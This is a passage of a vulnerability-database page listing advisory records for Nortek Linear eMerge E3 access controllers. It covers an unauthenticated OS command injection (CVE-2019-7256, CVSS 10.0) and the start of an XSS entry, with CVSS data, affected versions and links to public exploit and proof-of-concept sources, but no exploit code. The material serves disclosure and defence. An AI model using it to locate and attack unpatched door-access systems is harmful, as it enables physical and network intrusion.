Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
21 vulnerabilities by nortekcontrol
VAR-201907-0157
Vulnerability from variot - Updated: 2024-06-02 22:38Linear eMerge E3-Series devices allow Command Injections. Linear eMerge E3 The devices in the series include OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security&ControlLineareMergeE3-Series is an access control device from Nortek Security & Control. The vulnerability stems from the program using external input to build commands, but fails to properly handle the special elements of the commands that can be modified. An attacker could exploit the vulnerability to directly execute dangerous commands on the operating system
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0157",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security\u0026control linear emerge e3-series",
"scope": null,
"trust": 0.6,
"vendor": "nortek",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005909"
},
{
"db": "NVD",
"id": "CVE-2019-7256"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7256"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-107"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7256",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-7256",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-21274",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-158691",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 10.0,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7256",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7256",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2019-21274",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-107",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158691",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-7256",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21274"
},
{
"db": "VULHUB",
"id": "VHN-158691"
},
{
"db": "VULMON",
"id": "CVE-2019-7256"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005909"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-107"
},
{
"db": "NVD",
"id": "CVE-2019-7256"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices allow Command Injections. Linear eMerge E3 The devices in the series include OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security\u0026ControlLineareMergeE3-Series is an access control device from Nortek Security \u0026 Control. The vulnerability stems from the program using external input to build commands, but fails to properly handle the special elements of the commands that can be modified. An attacker could exploit the vulnerability to directly execute dangerous commands on the operating system",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7256"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005909"
},
{
"db": "CNVD",
"id": "CNVD-2019-21274"
},
{
"db": "VULHUB",
"id": "VHN-158691"
},
{
"db": "VULMON",
"id": "CVE-2019-7256"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-158691",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158691"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7256",
"trust": 4.0
},
{
"db": "PACKETSTORM",
"id": "170372",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "155255",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "155272",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "155256",
"trust": 1.8
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005909",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-107",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-21274",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "47619",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158691",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-7256",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21274"
},
{
"db": "VULHUB",
"id": "VHN-158691"
},
{
"db": "VULMON",
"id": "CVE-2019-7256"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005909"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-107"
},
{
"db": "NVD",
"id": "CVE-2019-7256"
}
]
},
"id": "VAR-201907-0157",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21274"
},
{
"db": "VULHUB",
"id": "VHN-158691"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21274"
}
]
},
"last_update_date": "2024-06-02T22:38:30.013000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
},
{
"title": "Nuclei Templates\nResources",
"trust": 0.1,
"url": "https://github.com/merlinepedra25/nuclei-templates "
},
{
"title": "Nuclei Templates\nResources",
"trust": 0.1,
"url": "https://github.com/merlinepedra/nuclei-templates "
},
{
"title": "Kenzer Templates [1289]",
"trust": 0.1,
"url": "https://github.com/elsfa7-110/kenzer-templates "
},
{
"title": "PoC in GitHub",
"trust": 0.1,
"url": "https://github.com/manas3c/cve-poc "
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7256"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005909"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-77",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158691"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005909"
},
{
"db": "NVD",
"id": "CVE-2019-7256"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 2.4,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/155272/linear-emerge-e3-access-controller-command-injection.html"
},
{
"trust": 1.9,
"url": "http://packetstormsecurity.com/files/155255/linear-emerge-e3-1.00-06-card_scan.php-command-injection.html"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/155256/linear-emerge-e3-1.00-06-card_scan_decoder.php-command-injection.html"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/170372/linear-emerge-e3-series-access-controller-command-injection.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7256"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/47619"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21274"
},
{
"db": "VULHUB",
"id": "VHN-158691"
},
{
"db": "VULMON",
"id": "CVE-2019-7256"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005909"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-107"
},
{
"db": "NVD",
"id": "CVE-2019-7256"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-21274"
},
{
"db": "VULHUB",
"id": "VHN-158691"
},
{
"db": "VULMON",
"id": "CVE-2019-7256"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005909"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-107"
},
{
"db": "NVD",
"id": "CVE-2019-7256"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21274"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158691"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7256"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005909"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-107"
},
{
"date": "2019-07-02T19:15:11.147000",
"db": "NVD",
"id": "CVE-2019-7256"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21274"
},
{
"date": "2023-03-01T00:00:00",
"db": "VULHUB",
"id": "VHN-158691"
},
{
"date": "2023-03-01T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7256"
},
{
"date": "2024-05-31T03:34:00",
"db": "JVNDB",
"id": "JVNDB-2019-005909"
},
{
"date": "2023-01-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-107"
},
{
"date": "2024-05-23T17:58:01.130000",
"db": "NVD",
"id": "CVE-2019-7256"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-107"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 For devices in the series \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005909"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-107"
}
],
"trust": 0.6
}
}
VAR-201907-0156
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices allow XSS. Linear eMerge E3 series devices contain a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Nortek Security&ControlLineareMergeE3-Series is an access control device from Nortek Security & Control. A cross-site scripting vulnerability exists in LineareMergeE3-Series. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0156",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security\u0026control linear emerge e3-series",
"scope": null,
"trust": 0.6,
"vendor": "nortek",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005908"
},
{
"db": "NVD",
"id": "CVE-2019-7255"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7255"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-108"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7255",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-7255",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-21273",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-158690",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-7255",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7255",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-21273",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-108",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-158690",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-7255",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21273"
},
{
"db": "VULHUB",
"id": "VHN-158690"
},
{
"db": "VULMON",
"id": "CVE-2019-7255"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005908"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-108"
},
{
"db": "NVD",
"id": "CVE-2019-7255"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
